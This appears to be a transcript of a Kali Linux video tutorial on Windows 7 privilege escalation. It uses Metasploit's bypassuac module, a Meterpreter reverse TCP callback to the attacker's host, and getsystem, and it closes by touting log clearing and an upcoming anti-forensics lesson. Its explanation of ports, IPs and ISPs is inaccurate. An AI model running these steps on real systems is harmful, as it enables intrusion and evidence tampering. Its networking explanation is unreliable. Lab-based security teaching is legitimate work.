Hey guys, welcome to the next tutorial of ethical hacking and penetration testing via Kali Linux. So in my previous tutorials, you might be wondering that I was talking since one or two tutorials previously that I would be teaching you to gain access into the system, and I have taught you to gain access into the system by being rhetorically, but it's just virtually, but not actually into the system. You're only the administrator or the normal user right now. So let's see how we can go ahead and gain access into the system. Once you have the interpreter command prompt open over here, as you can see, I have already the access. I have taught in previous tutorial how we can go ahead and gain access into that. I'll just type get privs, and as you can see, these are the enabled process privileges, but I cannot actually go ahead and this means that I only have these privileges. I don't have the whole system privileges, and in order for me to go ahead and get the system privileges, I'll have to go ahead and exploit the user account control, and I should be able to go ahead and bypass that. So let's go ahead and check if we could go ahead and do that. So I'll just type use priv, and as you can see, the privilege extension is already loaded. That means I have the privileges, but I only have it for the administrator. So but now I want it for the system, so I'll just go ahead and type for system info and see what all things are there. So the privilege access is for test user, that is the administrator, and Windows 7. And if I go ahead and type get privs over here, you can see that I have the shutdown, change notification privilege, and undock privilege. That means if I have these three privileges, I mean I'm not just the test user, I'm the administrator as well. But now we want to go beyond this thing and we want to gain access to that. So I'll just go ahead and first get the session into background. The reason being that I don't want to run this from the meterpreter. I want this meterpreter on, but I want to go ahead and use our MSF console to go ahead and do that. So I will first go ahead and check all the sessions. Okay, sorry, I will have to do that from the background. So I'll just first go ahead and check. I need to type run. Now this is a payload that I'm going to execute, so I'll type run post because it is under the folder named post, then windows/local/ sorry, no, not local, it's for the later one. Post windows gather /win underscore privs. So this will go ahead and run the post windows database, and it will try to give us all the information. Let's see what happens now. As you can see, previously when I ran get privs, okay, I'll just show it out to you if I'm able to. Okay, when I ran get privileges, it only showed me all the privileges that I have, but when I ran this database, it's showing me that it is not an admin, that means system admin, it is not the system, and user account control is enabled, and I am just the test user, that is a PC. But if you go ahead and check over here, if I type, you can see I am the administrator. So you might be wondering why it is not showing that I am not the admin. The reason being that Windows 7 has an inbuilt administrator. Whenever you go ahead and try to, if you forget your password, it is a system inbuilt local administrator that goes ahead and enables your PC. So let me check if I could enable the other one. I won't be able to do that from over here. I'll have to do that from the command prompt again, which I won't be doing that because I don't need that. And I can change the user account controls from over here. This proves that I am the system administrator. And over here it is showing that I am the admin, but I am not the system admin. Exactly, means in deep the default administrator, inbuilt administrator. I am just the normal administrator that is created by the user. So in order for me to go ahead and do that, I'll have to go ahead and exploit that and run this into background. So I'll just go ahead and type it over here. I'll just type bsckground, that's background, and the meterpreter shell is still working. If I want to get back to that, I can just go ahead and type sessions-l. It will show me the first one is still working. I can do I-1 to get back to that, but I'll just go ahead and get into the background. And just be sure that if you're trying this, what I'm trying to teach you, make sure that every word, every space is as exactly as I'm typing, else there will be a problem. And even if by trying once you're not able to do that, you're not able to gain access to that, that means that there may be a timeouts limit which this meterpreter has to gain access to system after bypassing the user account control. If you delay that, then again you won't be able to gain access to that. You will have to start everything from the cipher, that is 0. That means from the background again, the one which I would be teaching you right now. So just make sure that you do all of these things as quickly as you can. So I'll just do background, session 1 is still running. Now I'll type search UAC, and it will take a bit of time because it's trying to gather the database and all the payloads and exploits that is there in the system. We would be running one of the exploits and not the payload exactly, because we already have the payload in our victim's computer. So as you can see, I have all of these three payloads, and one is the post, this one which I used previously. I had the exploit Windows bypass injection, which is very good. It's given over here, but it is quite old, and I had the ask, will do only go ahead and escalate the execute run as I want to bypass the user account control. So I would be using this one, exploit Windows local bypass. So, and it is a very good one. As you can see, it's given excellent. So I will use and I'll be using this one. So I'll just go ahead and copy it and paste it over here. Use exploit / Windows local bypass UAC, and I'll hit enter. That means I am using, nothing will happen right now once you go ahead and press that. So after that, I will just go ahead and type set. I need to set this specific payload to our computer. So I'll type set payload Windows / and I'll type meter-preter / reverse _ TCP, because we are going to use the meter-preter prompt. That's why, and I'll hit enter. And so as you can see, I have set the payload to the Windows meter-preter reverse TCP. After that, I need to go ahead and use set the our local host, that means my own computer's IP address. So I'll type set L host, and I'll just go ahead and check. And this is my IP address. So I'll just copy and I'll just paste it over here. So 192.168.236.130, and I need to go ahead and set the local port for that, where I would gain access. And there's one thing important that I would like to teach you right now over here, that you cannot go ahead and use the same port that you created while creating this own original payload through which we have access to the system. Because if you go and do that, it will straight away quit, and it won't allow you to even use the normal meter-preter, because it will have two incoming connections, whereas there is only one port. So, and port is something like, for example, I'll tell you in detail how exactly a port works. Let's say, for example, you want to go ahead and ship something to your house. So I'll just go ahead and open the GEDIT. Okay, so let's say, for example, you want to go ahead and get something to your house. So how exactly would you write down the address? You will write down the your room number. That would be, let's say, for example, 453 would be your room number, and then you will type the building name or your society name, whatever it is. So let's say John's apartment, and then it would be like the where you stay, the area. So I'll just type, let's say, Sydney Road. The country name, let's say, for example, maybe it's California. So I'll just type California, and the zip code of 54321 example. So, and I'll teach you how exactly the system connection works of a port over here. Over here, I'll just go ahead and write down 453 is your port. That is the room number. That means it cannot be the same. It cannot access multiple things at one port. So over here, this is your port. That is your 453. After that, this John's apartment. This is your IP address range. Not exactly IP address range, or I can also call it as the MAC ID range. And after that, this California, that means this third part, this is your IP, that your internet provider. So that's ISP. So this is how it works. Whenever you go ahead and ask for incoming connection, it will first check the ISP. That means whenever you go ahead and order something, they will first check your state. Once they come to your state, they will check your apartment or your road name, that is the IP address and MAC ID, and then finally the port. So in this way it works. So now the same thing I want over here. I want a good L port name, that is local port name. So I cannot use the same name because I am already using that. That means you cannot enter two people from the same door. So I'll have to use some other port. So let's say I'll use 2960 for example. And after that, First thing I would like to tell you is that this may not work because I already used a lot of time explaining that. So if this goes and I'm not able to run this, I'll go ahead and run it again just to make you know. And after that, since I have set the L port, I need to go ahead and use this session. So I'll just go ahead and type sessions -L. This is the ID of our session is 1. So I'll type set session space 1 and make sure that this session is only session, not sessions, unlike over here. And you need to make sure that this is in uppercase, not lowercase, else it will not work. Set session 1. And now finally I need to check whether everything is correct. So I'll type show options. Perfect. So as you can see, this is the IP address of our listener of my computer. This is the L port from which we will be gaining the connection, and the ID is 0. That means we are using it to go ahead and access Windows into 32-bit system. So I'll just go ahead and type exploit right now, and it should go ahead and exploit that. Let's check if we are able to go ahead and bypass the system settings. I believe it's working perfectly. Perfect, it just ran perfectly. So as you can see, user account control is set to default, and I have already bypassed this setting. If I go ahead and run this in the background, as you can see, I should be getting 2 connections in total. So if I go ahead and type sessions-L, I had 2 connections over here. The first one is the default test user, the second one is the administrator. So I will go ahead and type sessions-I space 1. Okay, sorry, I wanted to go into 2. Perfect. And I'll go ahead and type get sys, I'll just type sysinfo, and I'm still the test user, but let's check if I have the privileges of a system. So I'll just go ahead and try to get system. Perfect, it ran. Whereas previously when I tried to run it, it gave me an error. Let me check if I'm able to see that. Okay, let me just check where it is exactly. Okay, task kill. This is where the command prompt is. Okay, we should be here somewhere. When I tried get system previously, it did not work. It gave me some kind of error previously. Or rather than going ahead and searching this, I have better idea of actually going ahead and showing you. Let me just check. Okay, so when I tried get privileges previously, it only gave me these privileges. And right now, if I go ahead to the background, if I go ahead and background this session, and if I go ahead and use the session 1, and if I type get system, it won't. The reason being that I do not have the system privileges over here, whereas in session 2, okay, I'll just go ahead and background this session. As in session 2, if I go ahead and type get system, it works perfectly. So now I am the system and I can do anything that I want. That means I can go ahead and edit any of the files that I want, and I can even go ahead and clear the event logs or view my own Windows password, which we did not have when we were trying to access the R desktop, that's the remote desktop. So that is it guys for this tutorial. In the next tutorial I'll be teaching you how we can go ahead and modify the system files so that even if a forensic investigator goes ahead and tries to search as to who accesses the system, he will not be able to. So that's it guys, I'll be meeting you in the next tutorial.